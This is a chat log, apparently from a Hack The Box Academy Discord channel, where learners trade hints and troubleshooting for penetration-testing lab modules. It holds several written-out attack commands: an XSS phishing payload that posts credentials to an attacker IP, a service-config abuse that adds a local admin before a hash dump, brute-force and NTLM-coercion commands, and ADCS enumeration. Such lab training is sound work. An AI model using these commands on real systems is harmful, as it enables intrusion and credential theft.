#modules

hey guys I have a problem in Exploiting Web Vulnerabilities in Thick-Client Applications section in attacking common applications module, it's been months and I have the same problem that is there is no button to open

mb didn't knew that you just can copy past an exe file -_-

This module was a pain!
Good luck!

https://forum.hackthebox.com/t/how-many-pen-testing-labs-did-hackthebox-have-on-the-8th-august-2018-answer-with-an-integer-eg-1234/330107?u=nosystemissafe

Hi folks

I finished the "Credentialed LDAP Enumeration" module.

But I will admit, I solved some of the userAccountControl questions via AI

Is there any good site or blog where I can learn more about custom ldap queries?

Like this stuff: --custom "(&(userAccountControl:1.2.840.113556.1.4.803:=512)(userAccountControl:1.2.840.113556.1.4.803:=128))"

It's not an issue

Htb wasn't always a .com website

The ad enum and attacks module has a neat little graph about perms and such

Happy diwali

To all of you

Same to you, but please verify your account Please read #welcome and #rules it will explain how to get verified

I am a new member

Same to you bhai

Welcome. Read my message right above

@storm elk bro rule kafi long hai

English please. this isn’t general chat

Rule is to long

Can anyone explain how to be become a ethical hacker

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

#modules message

@signal sapphire anyone also help me

Hello, doing File Inclusion > Skills Assessment. I have found the hidden admin page : ||http://94.237.62.166:40163/?page=ilf_admin/index|| however the page doesn't display correctly. There's squares all around and all the text is in just one long string, nothing gets displayed. Whenever I click on one of the logs, it just brings me back to the main page. I thought it might have been my network but it's the same on the PwnBox too. And I tried restarting the target but it doesn't change anything. Can anyone help me understand what's going on?

Thanks for reply. But does it talk about the values and stuff? this is more custom queries.

Also, should I sping my wheels on that? I know we can get some useful stuff via Bloodhound. Not sure how valuable would be, learn more about ldap custom queries, especiall when we can use AI.

Someone can correct me if I am wrong.

Hey, @storm elk
have you done the advanced deserialization module?

Yes it talks about what values correlate to which UAC functions

Most people think whenever an IP Address changes, it is a proxy, and in most cases, it's probably best not to correct them as it is a common and harmless misconception. Correcting them could lead to a more extended conversation that trails into tabs vs. spaces, emacs vs. vim, or finding out they are a nano user.

I love finding these things in the modules

i found that with the image in the section but in real world is there i way to find if a website or domain existed on another tld previously

Doing some googling and light osint since HTB is an eu based company it's not a long stretch

i did google but nothing found maybe i am a noob at osint

tell me

I literally told you; HTB is an EU based company

Think about what tld would correlate to thay

Is any one solving now CDSA?

before that i know that it was EU and thanks that u replied to me . i am asking is ther a way to find if a website existed on another tld like this . i dont understand how to google to find the solution to this

Someone? 😊

Yes I have.

Can I DM you for a few pointers on the XML section?
Can’t figure if I’m setting the type wrong or something

Sure. I’m about to go out for a bit though

No hurry, respond whenever you feel like it
I’m just trying to understand that last part

yes

Can someone please help me with a nudge to find the open button?
Module: Attacking Common Applications.
Section: Exploiting Web Vulnerabilities in Thick-Client Applications.
Problem: I can't find the open button in the java app..

hello i have buy gold subscription and wait more then 10m and still i cannot access any modules

did you purchase gold annual? which unlocks up to tier 3, or did you purchase gold monthly which only gives you 500 cubes?

really?! i just buy monthly

can anyone help me with a nudge on kerberos attacks skills assessment last question
i have creds of an** but not able to rdp on ||SERVER01||

student can access all tier 2 modules and gold cannot access anything what a shit logic!!!

not really, students often time have discounts on learning resources so it kinda makes sense to me

the silver/gold/plat give 200/500/1000 cubes a month
student is up to tier 2, similar to how the silver/gold annual work

im student btw, but its not clear when u giving student full access tier 2 and gold have only 500cupes.

if you are a student, confirm your email and get the student monthly for $8/m and have up to tier 2 unlocked

i dont want tier2 i want tier3. anyway if i sent an email and not used the cupes can i got my money back?

you'll want to reach out to support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

the package you're looking for instead would be the gold annual

which flag did you use to get the full TCP three-way handshake?

1300$ i go for osep better at least getting me a job

anyway thanks bro.

np

Hello, good evening, can someone help me with NoSql Assessment II? I'm stuck hehe, I got a hash but I can't break it, can anyone tell me if this is the way?

||I found a nosql time based on login and I can't list another user besides bmdyy, so I managed to get his password hash and I got stuck||

Look for another possibility besides cracking the password.

Fixed it, you need to restart the target until it works...

@acoustic owl can i dm you?

I will be very grateful if you can give me a tip on how to solve it

Can we have an android related module please?
Something to cover the history and methods of exploiting mobile devices
For example older androids had a vulnerability that allowed someone to gain access to their config file and give themselves unlimited wrong password attempts and brute force their way in which is patched in newer androids but knowing the history wouldn't hurt
Also include android based malwares and AV evasion methods on android and so on.
Would be cool to have it

Friends, could you please tell me, in the MSSQL, Exchange, and SCCM Attacks: Skills Assessment, after completing the second-to-last task, I got the final flag without any effort. Was it meant to be this way?

Yes.
But you can train with pushing a script

Hello, may I get some help for the Credential Hunting in Linux part of the password attacks module ?
I did try to perform a brute force attack over ftp using the provided list but nothing worked... Is this the correct way to gain an ssh access ?
Even the "Help" didn't really help me...

did you try the mutated list?

Yes I did use the custom.rule on the password.list

rules are different than the password list

I mean I did use the custom.rule file and applied them to the password list

so you didn't use the mutated password list then?

which mutated password list ? I only got 2 list (user & password) and a .rule file

the password list I used come from this command : hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

oh yeah sorry was thinking of something else maybe.. hard to say from my notes. yeah that looks right.

right so that's the mutated list

I did try on ftp as it is quicker than ssh

I used both cme and msfconsole (ftp_login module)

i used hydra

I will try it

on ftp or ssh ?

generally you don't want to attack ssh unless specified, it's tough to brute ssh

yes it's why I did cme & msfconsole on ftp...
But also the hint gives the password & username but even with that I can't ssh into the machine... This is weird. I don't know if i'm dumb or what at this point xD

I will try to reset the machine before performing the brute force with hydra. Thank you for your help

guys a quicly question

i get this error whent i run crackmapexec
"bash: cme: command not found"

how can i fix it?

do you have [netexec] installed?

it's a fork of cme that's actively maintained

Cme was replaced by nxc

On pwnbox there was an official changeover

cme isn't the command, it's crackmapexec the whole thing

cme was archived ~1yr ago anyway, and is no longer maintained

Even longer probably

yes I know, when I run crackmapexec , the response is bash: cme: command not found

yes i got it

you should be able to substitute your cme commands with netexec or nxc

Sounds like CME isn't installed, you can just use netexec as calc and marcie mentioned

ok it works

thank you

if i add myself to the Administrators
group does that mean i have full access on the DC?

or is that just the administrator on that local computer?

depends on which administrator's group. any group can have the powers of a domain admin. if we're going with default settings, it sounds like only a local admin.

mind if your able to vc i just want to undertsnad things better?

i don't want to vc

just check the groups to see if it's local or not

sure let me explain further: The server operator group is able to log in locally to servers, including Domain Controllers.

In the Windows Privilege Escalation module they did C:\htb> sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add" Which was to add the current user to the administrator group, and from there they then did
secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator

So my questions are, is this administrator group of the local DC?

If it is would they give you acess to the domain controller? if not would this command be better cmd /c net group "Domain Admins" user /add /domain

Like im confused how they were able to dump the hashes when wouldnt this be the local administrator group of the server.

sorry if this is a dump question

yeah net localgroup is a command for local groups, not domain groups

ohh so they added it to the local group of the DC?

right, that would only give you local admin to the DC not domain admin

but if you have some kind of exploit that can run commands to privesc, you can modify it to do other things

also could the same hash dumping be achieved if added to the domain admin group like using cmd /c net group "Domain Admins" user /add /domain

probably but you'd have to test

alright thanks helped a bunch

oh shit last question on this, ik this is stupid but , so if im becoming a local admin on the DC and can then dump the hashes. This means as server operator which can log in locally to servers, including Domain Controllers. I **must **login to DC and use this exploit specifically on the DC. to join specifically its local admin group so i can dump hashes.

English only server sorry

sorry not sure what you're asking

nvm all good i get it, just wanted reassurance lol

Hi guys i wanted to know the diff when fuzzing a url vs lents say i just dont understand what fuzzing a wordlists is for example FUZZ vs :FUZZ

i hope it makes sense

sounds like you're talking about ffuf

yeah

i just dont get :FUZZ part

that's just a wildcard to tell ffuf to fuzz with a wordlist and where to fuzz

i see thanks man

wordlist.txt:FUZZ, this tells ffuf to use "wordlist.txt" to iterate through the list where you put the "FUZZ" wildcard, so ffuf -w wordlist:FUZZ -u http://fuzz.htb would fuzz the "fuzz" part of http://fuzz.htb

like it recurves ?

i think you can change the wildcard and have multiple of them, so you could do ffuf -w wordlist:BUTTS -u http://BUTTS.htb and get the same result

Unless there is cached creds in a domain joined host which is not a domain controller, you'd be only dumping local hashes.
Also, if I'm not mistaken, whenever a host becomes a dc, it should not have local accounts.
So, if you grab a hold of a "Administrator" account from a DC, it should be the "Administrator" account for the Domain

it just tells ffuf to use the chosen wordlist in the specific location

The Cicada (easy) box was a good example of this.

ill research more about it thanks

you can also do multiple wildcards like this ffuf -w usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://localhost:3000/login -fc 200

You gotta restart it until you can, but you don't need it to go to next step.
You can ignore this issue.

👍

Hello fellow hackers

Right in the feels with that one.

hi I'm doing Linux credential hunting. Hydra won't give me a password for will or kira

and I have the usernames list but brute forcing both that and the password list would take forever

and I could do that but I don't know if that's a good approach

this is for the Linux Credential Hunting section of Password Attacks module

am I doing the right thing by brute forcing the usernames and passwords both?

I have a usernames list and a passwords list from the resources section

hydra never finds anything and I'm unsure if trying every username/password combo using the username list and the password list separately is a smart idea or if I'm going in the wrong direction

if i remember good try with Kira or kira

I did it didn't crack it successfully with either

and same thing with Will and will

and brute forcing it with both username list and password list is taking a million years

you need to adapt the list with the hint provided

ok

tell me if you still need help

I'm gonna try again tomorrow first

I'm at party so gonna sleep on it try again tomorrow

now that I know hydra is the right way to go

👍

Yes, of course, but I'm not online regularly this week. So an answer may be delayed

Have a look at what other functions the website offers.

AD Enumeration and Attacks, Section Bleeding Edge vulnerabilities. They mentioned this

Let's walk through the attack. First off, we need to start ntlmrelayx.py in one window on our attack host, specifying the Web Enrollment URL for the CA host and using either the KerberosAuthentication or DomainController AD CS template. If we didn't know the location of the CA, we could use a tool such as certi to attempt to locate it.

Anyone knows how to use this tool to locate this ? No idea how to actually find the location of the CA
https://academy.hackthebox.com/module/143/section/1484

certi.py find -d <domain> -u <username> -p <password>

like this ? I cloned it from the github repo they mention there

kali@kali:~/Downloads/Support/certi [01-11-2024 10:46]$ ./certi.py find -d support.htb -u guest -p ''
usage: certi.py [-h] {list,req} ...
certi.py: error: argument command: invalid choice: 'find' (choose from 'list', 'req')
                                                                                                                                                                                             
kali@kali:~/Downloads/Support/certi [01-11-2024 10:47]$ ./certi.py -h                                
usage: certi.py [-h] {list,req} ...

positional arguments:
  {list,req}

options:
  -h, --help  show this help message and exit
                                                                                                                                                                                             
kali@kali:~/Downloads/Support/certi [01-11-2024 10:47]$

oh it is list not find

yeah, tried a few more things and it shows this, I guess you cannot enumerate it without credentials, even though petitpotam works without any creds

kali@kali:~/Downloads/Support/certi [01-11-2024 10:57]$ ./certi.py list --dc-ip 10.129.230.181 support.htb/guest
Password:
Traceback (most recent call last):
  File "/home/kali/Downloads/Support/certi/./certi.py", line 5, in <module>
    certilib.main()
  File "/home/kali/Downloads/Support/certi/certilib/main.py", line 245, in main
    return main_list(args)
           ^^^^^^^^^^^^^^^
  File "/home/kali/Downloads/Support/certi/certilib/main.py", line 450, in main_list
    templates = list(fetch_templates(
                ^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Downloads/Support/certi/certilib/main.py", line 651, in fetch_templates
    resp = search_ldap(
           ^^^^^^^^^^^^
  File "/home/kali/Downloads/Support/certi/certilib/ldap.py", line 69, in search_ldap
    return ldap_conn.search(
           ^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/ldap/ldap.py", line 402, in search
    raise LDAPSearchError(
impacket.ldap.ldap.LDAPSearchError: Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5A, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
                                    

you can try passing "empty" creds for anonymous bind, might not work all the time though

hmmm, how would you do that though ? for me the tools seems to want to take in a username no matter what

-u "" -p "" does not work?

like this ?

kali@kali:~/Downloads/Support/certi [01-11-2024 10:57]$ ./certi.py list -d support.htb -u '' -p ''              
usage: certi.py list [-h] [--dc-ip IP] [-k] [-n] [--class [{template,ca,service,ntauth} ...]] [--aes hex key] [--enabled] [--vuln] [--temp-name TEMP_NAME [TEMP_NAME ...]]
                     [--temp-filter TEMP_FILTER] [--hashes LMHASH:NTHASH] [--ssl]
                     target
certi.py list: error: argument target: Domain of user 'support.htb' should be be specified

I'm a little lost, looking at github "list" doesnt even seem to be a valid command?

it is, according to the help menu at least

kali@kali:~/Downloads/Support/certi [01-11-2024 11:02]$ ./certi.py list -h                                    
usage: certi.py list [-h] [--dc-ip IP] [-k] [-n] [--class [{template,ca,service,ntauth} ...]] [--aes hex key] [--enabled] [--vuln] [--temp-name TEMP_NAME [TEMP_NAME ...]]
                     [--temp-filter TEMP_FILTER] [--hashes LMHASH:NTHASH] [--ssl]
                     target

positional arguments:
  target                domain/username[:password]

options:
  -h, --help            show this help message and exit
  --dc-ip IP            IP address of domain controller
  -k, --kerberos        Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
                        specified in the command line
  -n, --no-pass         don't ask for password (useful for -k)
  --class [{template,ca,service,ntauth} ...]
                        Classes to retrieve
  --aes hex key         AES key to use for Kerberos Authentication (128 or 256 bits)
  --enabled             Show only templates that are used by some enroll service
  --vuln                Show only templates with vulnerable configurations
  --temp-name TEMP_NAME [TEMP_NAME ...]
                        Request only template with the given name
  --temp-filter TEMP_FILTER
                        LDAP filter for templates
  --hashes LMHASH:NTHASH
                        LM and NT hashes, format is LMHASH:NTHASH
  --ssl                 Use LDAPS instead of LDAP

oh I'm looking at the windows one wops

yeah, it's really confusing hence why they should have included it in the module....

maybe try certipy-ad

you can try netexec/crackmapexec too crackmapexec ldap 172.16.117.0/24 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -M adcs

I assume you'll need creds anyway to abuse it in the end

certipy-ad find -u '' -p '' -target sequel.htb -text -stdout -vulnerable

well that's the thing petitpotam it's supposed to not need credentials

from the official github https://github.com/topotam/PetitPotam

kali@kali:~/Downloads/Support/certi [01-11-2024 11:08]$ certipy-ad find -u '' -p '' -target support.htb -text -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[-] Username is not specified
[-] Got error: socket ssl wrapping error: [Errno 104] Connection reset by peer
[-] Use -debug to print a stacktrace

kali@kali:~/Downloads/Support/certi [01-11-2024 11:05]$ nxc smb DC -u guest -p '' -M adcs                   
[-] Module ADCS is not supported for protocol smb
                                                                                                                                                                                             
kali@kali:~/Downloads/Support/certi [01-11-2024 11:07]$ nxc ldap DC -u guest -p '' -M adcs
SMB         10.129.230.181  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
LDAP        10.129.230.181  389    DC               [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5A, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP        10.129.230.181  389    DC               [+] support.htb\guest: 
ADCS        10.129.230.181  389    DC               [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.129.230.181  389    DC               [-] Obtained unexpected exception: Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5A, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c

smb > ldap

is the lab just messed up lol

it's not for a lab, in the module, it's against a random machine on the site. Just trying to apply the module knowledge. They say you can identify the enrollment part with this certi tool, but it does not seem to be the case. They could have covered it imo, considering ADCS is not really an easy thing to mess with

kali@kali:~/Downloads/Support/certi [01-11-2024 11:09]$ nxc smb DC -u guest -p '' -M adcs                                    
[-] Module ADCS is not supported for protocol smb

sadly does not seem to support it

https://0xdf.gitlab.io/2022/12/17/htb-support.html#auth-as-ldap

yep I know, it's not about the box, it's about the tool they tell you to use

Okey thanks

I'm on the web attacks module, http verb tampering section (basic auth bypass). This command curl -i -X OPTIONS http://IP:PORT should show me the available methods the web app accepts, but is not showing me anything

was the crackmapexec module skills assessment updated?

I was able to get the flag by sending random methods, but that command right there should return de Allow header showing me the allow methods, right?
Just like the module explains

AD enum & attacks - kerberoasting from windows

I know the module said

Now that we have seen the older, more manual way to perform Kerberoasting from a Windows machine and offline processing, let's look at some quicker ways. Most assessments are time-boxed, and we often need to work as quickly and efficiently as possible, so the above method will likely not be our go-to every time. That being said, it can be useful for us to have other tricks up our sleeves and methodologies in case our automated tools fail or are blocked.

but if Rubeus is blocked, won't mimikatz also be blocked?

like, idk but mimikatz feels more famous than Rubeus

I need help with Whitebox Attacks Type Juggling Authentication Bypass
If anybody have completed that and sees this message, please let me know.

Just ask ur question

The type juggling, can't exploit it on the login endpoint

if (pw_hash($data['password']) == $user['password'])

According to the module if you send a password value 0 it should match the admin user's magic hash which starts with 0e....

There’s multiple payloads given in that section iirc

but this doesn't works for me!
I tried a value which it's sha-256 hash will start with 0e (34250003024812) but still no luck

The hint I’ll give is brackets

The endpoint accepts JSON are you sure that i still can use the [] here?

@analog dock for type juggling?

Yes

That section talks about some vulns in how a specific PHP version handles stuff.
Try googling it

Getting Started module: Last Check
I have user privilege at the machine, I competed the LinEnum scan in the reverse shell it shows me this:

When I'm trying to run the command It says: permission denied

Check the directory

there are lots of files in the directory, hundrets of them

Check both of your screenshots.
What one says and what you are trying to accomplish in a directory that you don't have permissions

Also.... The sudo is for running binaries in a "super user" context, not writing inside the directory.
So, try to write the WebShell in a directory that you are allowed to write, then run whatever binary as root

https://gtfobins.github.io/

hello

@dapper moth I'm lost, I don't really understand what to do. If you can please hop in the voice to me.

You have enumerated that you are a SUDOER for some specific command
The GTFOBins I sent you can give the specific commands as to escalate privileges depending on the command you are allowed to pass via 'sudo'

Just have to adapt to the output you got

Good morning guys, could someone give me a light on NOSQLI skill assessment II?

I've managed to do it, thanks

Hi guys, I'm doing the penetration tester path and in the metasploit module of "sessions" I have to use metasploit to exploit elfinder. One of the questions is as what user you are logged in now. I tried "meterpreter> shell" but for some reason it's broken. And I know I can just use "getuid" command instead but the walkthrough is using meterpreter> shell, and I believe I had problems with this command yesterday as well, but didn't think much of it.

meterpreter > shell
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments

Does anyone know what I should check?

Nevermind I think I got it

Module: Cross-Site-Scripting (XSS)
Section; Phishing
||'> <script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.196:8080/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script> <!--|| im confused why this payload doesnt work, tried to send it like this, then url encoded. am i missing something or what? it just keep saying invalid url

Good morning! I am on Identifying SSRF module and having hard time finding the flag. I found some open ports with ffuf but when I can’t browse them. Any hints please?

I did this module some time ago, but aren you suppose to put this into a form field on the webpage and not the url?

yeah

So in PwnBox "meterpreter> shell" command works, but on my own kali box it just doesn't work smh, I also updated, upgraded, autoremoved, autocleaned everything, even reinstalled metasploit, but so far no luck. Anyone know what's going on here?

what happens when you try it ?

meterpreter > shell
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments

looks like it could be a recent, still open, issue: https://github.com/rapid7/metasploit-framework/issues/19569

I'm about to go through the same section same module, and just updated my parrot VM. Might have the same problem, will let you know

Ohhh ok yeah that might explain it, so I'm guessing that metasploit on my kali machine is a more recent version than the one on the parrot PwnBox?

Good luck and thanks for the info 🙂

possible yeah, I'm not sure how often the pwnbox gets updated

Yep just checked, metasploit on my kali is more recent. Guess we'll just have to wait for that update then and use PwnBox for this module

does it match the version on the bug report ? Framework: 6.4.32-dev-

or higher, I suppose

yep thats my kali version

pwnbox is on 6.3.44

I'm on 6.4.44-dev-, so I guess I'll be affected too. Let's see

let me know

If it does work I'll have to not install it through apt lol

Looking to get any directions on this please

Hallo, I can't figure out how to do the login brute force skill assessment 2. I have used username-anarchy to create a list of usernames for Thomas Smith and then used the passwords.txt file for my passwords. However, when I run this Hydra command, it can't find any combinations: hydra -l thomas -P passwords.txt -f ftp://83.136.253.249 -v. and when i try to run medusa it cant connect to port 21. If anyone has any ideas on what I might be doing wrong, please let me know

it worked for me, I'm afraid 😦 I guess there's more to it than just the version

Why is there more to it than just the version you say? It worked right? Anyways thanks for letting me know, I think I might also install Parrot OS, from what I've seen so far it may work a lil better than Kali at times

Anyone got any ideas on the WI-fi penetration testing basics module, cant seem to understand what "locate the flag at <ip_address> wants me to do> Connect to the WPA Wi-Fi network named "CyberNet-Secure" with the PSK "Password123!!!!!!". Once connected, locate the flag at the IP address 192.168.1.1.

I mean that I should be affected if it were only a matter of versions; the report was on version 6.4.32-dev-, the issue is still open and I'm on 6.4.44-dev-

Ahh gotcha, yeah maybe some weird dependencies

oh wait, the issue is closed actually! It was so recent that I assumed it was still open

so I guess my version is patched already (hard to confirm quickly with their versioning convention, but I guess that's it)

https://tenor.com/view/squidward-spare-change-spare-some-change-begging-poor-gif-18999842

Visit the IP in the browser

Figured
Now just stuck at the SA

Tried that, dosent work

javscript deobsfucation skill assesment As you may have noticed, the JavaScript code is obfuscated. Try applying the skills you learned in this module to deobfuscate the code, and retrieve the 'flag' variable.

i found the code and put it together

and flag but i doesn't acccept for somer reason

nvm got it

Hello. Sliver Module, first lab. Cannot get upload attack to work. After uploading stager, I go to the link of upload and it shows error:

Server Error in '/' Application.
Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.

Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".


<!-- Web.Config Configuration File -->

<configuration>
    <system.web>
        <customErrors mode="Off"/>
    </system.web>
</configuration>


Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.


<!-- Web.Config Configuration File -->

<configuration>
    <system.web>
        <customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
    </system.web>
</configuration>

🆘

is there anyone near the information gathering module ?

its in information gathering/digging DNS
ive tried every single command possible but its not working .. so its either a glitch or theres something stupid happening

Are you on the skills assessment?

Anyone able to help me out - doing the sliver module, I've got an interactive SYSTEM shell, I can run "hashdump" no problem, but when I try and use the "execute" function for arbitrary things (such as "whoami" or "schtasks /query" with the --output flag enabled) I get an exit code of "3221225794" - when I run it as the administrator account, works fine..

regarding my question, i just figured out they updated the module so nevermind

Hi, who can give me a hint in Advanced SQL Injection Skill assessment (RCE)? It seems that CREATE function doesnt work

section

just after 'Privilege Escalation' - its not part of any questions, I'm just wanting to play around with sliver more as im new to it..
Example screenshot:

Hello,

I'm currently stuck at the question : Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.
Module : Password attacks
Chapter : Pass The Hash

I did try to use smbclient & smbclient.py and I manage to connect to the shared folder however there is no DC01 folder.
I tried to perform a scan to enumerate shares on a /24 to see if maybe another host was up using cme but didn't get any result.

Can I have a hint please ?

\\DC01\ is another machine

oh I understood now I have to do it from the MS01 machine. It's why I don't see any other IP with my kali I guess ? Thank you !

For ntlm relay module anyone know why I would get "NO_AUTH_RECEIVED" from coercer for every request when I double checked creds and responder is running?

(am getting same response when scanning)

Guys

Ok having a problem with metasploit

So basically I'm Ubuntu, I used the command sudo snap install metasploit framework, then I did msfconsole and I got a text saying that it's more than 2 weeks old and I should do msfupdate

Then I do msfupdate and it says it's not supported and I should do sudo snap refresh metasploit-framework

And after I do that it tells me metasploit framework has no available updates

And then I do msfconsole and it tells me again metasploit framework needs to be updated

What do I do? I'm trying to use eternal blue exploit and it keeps failing

how does it fail ?

the snap package is probably just not updated

but that is also unrelated to eternal blue exploit failing

With the other sessions does it output ok!?

Like this

Over and over again

do you have to use eternalblue ? I've always had (far) more luck with the psexec exploit for the same issue

Idk the module used eternal blue

Why is it not working

which module/section ?

Shells and payloads infiltrating windows

"Since I have had more luck with the psexec version of this exploit, we will try that one first. Let's choose it and continue the setup."

Shouldn't you be coercing 172.16.117.50?

same goes for .50

Depends on the type of auth the Host accepts

questions ask your to run against .60

Have you tried:
python3 Coercer.py -t 172.16.117.60 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -wh SUPPORTPC2 -wp 80 -v?

ah no I didnt try using 1.6/webdav

let me spin it back up

Might be the problem:
Coercer has the --auth-type option that allows us to specify either http or smb, depending on the type of NTLM authentication we want to coerce; however, unfortunately, all 2.* releases of Coercer cannot successfully coerce HTTP NTLM authentication on hosts with WebDAV enabled (the tool only can coerce SMB NTLM authentication). Regardless of offering fewer methods compared to 2.* releases, release 1.6 successfully coerces HTTP NTLM authentication.

On AD Module how come I ping hosts and find 245 last month, and this month I can only find 224 ?

Mh ur right

How to ping unpingable hosts which are still up ?

It still times out tho

@shut wraith I remember u

U were in the Muslim discord

Yeah Im still there

Asalamulaikum

Jummah Mubarak

is your LHOST the right one (VPN) ?

no I am trying to answer this question 'Exploit a SSRF vulnerability to identify an internal web application. Access the internal application to obtain the flag' in SSRF module but cant browse that internal web with the ports I found.

Ye I did ifconfig

Wa alaikum salam habibi

Jummah Mubarak

Brother Eternal Blue fails normally even on vulnerable target. Not related to updating metasploit

paste your options to confirm. You can DM if you'd like

When I did the eternal blue box, I used 3 terminal tabs to spam the exploit at the target, maybe 1 works

If doesnt -- reset the box and try again

yeah this just gives these pipe disconnected errors

Ye but I also tried psexec

Ok one moment

I'll give a check later and tell you if I couldn't do it
Finished this thing a while back

beast, yeah I've moved on, u can assume the module answers thankfully but I think this section might just be broken for me at least

@urban elk worked

cool! I'm glad, what changed ?

Htb vpn

cuz DC01 is an internal IP iirc

Indeed

It's internal to the MS01 network (172.16.x.x)

who can help with Advanced XSS and CSRF Exploitation Skills Assessment?

what's up

I listed all the customers and found a customer
but I don't know what to do next.
I texted you what I found in dm

Hello Everyone! I hope you all had a wonderful week! I have a question about connection issues. I was running through the "Getting Started" (Public Exploits) module, but I keep running into errors while enumerating the target IP. The particular one I am seeing now is a EOF error with gobuster. I also can not get feroxbuster to connect either. I identified ||wordpress|| on the target so, I tried ||wpscan|| again it says the site is down... It clearly is not. Just wonder if there is a setup issue I am running into.
Yes, I am connected to the VPN

I'd really appreciate it if you could help.

You don't need to browse to anything. Are you still working on this one?

Yo

How do I install metasploit in Ubuntu without snap

I am trying to add an exploit to metasploit but it says snap is read only

I tried removing it and installing again with the -classic flag but it still says it's read only

read the docs?
https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/#installing-the-metasploit-framework-on-linux

?

I have it installed

I cant write in the exploits directory bc it says it's read only

But I did install metasploit multiple times

use sudo?

It doesn't work?

Could someone be kind enough to help me with Login Brute Force, Login Forms? For the question it asks me to successfully brute force and login into the target, which I did, but I cannot find the flag in the html document

hello could you help me, I'm trying to configure the wagger with the ip that gives me the HTB api module and I can't figure out how to do it.

you should try explaining what you are actually wanting then, you first said install without snap, then you're saying you already have it installed, but now you want to add plugins. You should be able to sudo touch /dir, if not do it as root.

if you're logged in, it should be right below the logout button

I see, thanks!

yep, in the screenshot it shows it working as defaultapppool, then switching to system beacon - it doesnt work..

i have googled that error code a bit, but unsure if someone else has faced a similar issue specifically within sliver

Yes I still cant figure it out

You can DM me.

who can help with Advanced XSS and CSRF Exploitation Skills Assessment?

For the Introduction ot Network Traffic Analysis Module - Fimiliarity with Wireshark section. Where are we supposed to run WireShark in the Pwnbox? I can start Wireshark but I cannot see the eth0 interface listed in Wireshark.

OR

Are we supposed to run Wireshark our local desktop? Thanks for your help

Doesn't matter where you run it as long as you can open the pcap file if i recall correctly

OK cool thanks.

ah u had to recreate the plaintext$ computer object nvm

Did you get it!?

Is the site undergoing maintenance? It keeps disconnecting me from the target's IP.

Yo

So I'm on shells and payloads, laudanum

I edited my /etc/hosts in Kali, downloaded shell.apx and I put my IP address in it, then I went to status.inlanefreight.local and I uploaded the file. It's not telling me the directory of the file and when I go to status.inlanefreight.local//files/file.aspx it gives me error 404

I tried a new IP for the box multiple times and I changed my vpn too

Idk what going on

it's weird that it's not telling you the directory, but did you use backslashes as instructed ?

In file upload? Or in url? In url I tried everything

in url

Ye ye I tried everything

Hi guys, im in the module information gathering - web edition.
Third question about getting the api key in the hidden directory, i already did vhost, fuzz with multiple dicctionary and tools but nothing

I also tried to upload antak.aspx in the next room but it still doesn't tell me the directory. It doesn't even tell me if it's uploaded but I don't think it is

that's odd. So you pick the file, you hit Upload file, and after the page refreshes you don't have the same feedback at the bottom of the page, as shown on the screenshot ?

Exactly

Hit upload and just see on the bottom left the url of the upload page

For like half a second

And then I go to the url where the file should be and it shows me the search engine results of the page if I use the //file directory

Otherwise it gives me error 404 if I use anything else

ok the url disappearing is weird, but are you sure you've tried "\files\file.aspx" ? As opposed to //

ugh, the double backslash is escaping... so it's double backslash before files

\\files\file.aspx

I write \files\file.aspx and the browser writes it back to /files/file.aspx

that's normal, but it should load the webshell

No it's giving me error 404

are you sure your IP is correct on the allow list of the webshell ? Again, the VPN (tun0) IP

Ye

Like I got shells from different modules with that ip

Also the antak.aspx doesn't even ask me for the login credentials : (

I'm afraid I don't know what else could be wrong, sorry 😦

Np

Thx

anytime, I hope you figure it out or someone else has a clue

bruteforce vhost for subdomains with subdomains-top1million-110000.txt

then brute force that subdomain for directories, then brute force

(hidden subdomain).inlanefreight.htb:40707/

for another subdomain and i think you can figure out from there.

I promisse i go trough the entire list and other dictionarys, meaby i have to reduce the threads

Can you send me the link for the specific question, i did it before , and had the same issue but cant remember. So let me see that question again and ill help.

how many threads are you doing

Deafult, i think it is 10

let me dm so we dont clog up the chat but i think i can fix your issue

But with that hint is enough, meaby im doing something wrong

I will dm you if needed, i want to try first, ty.

ok np

Module: API Atacks
Section: Broken Object Level Authorization

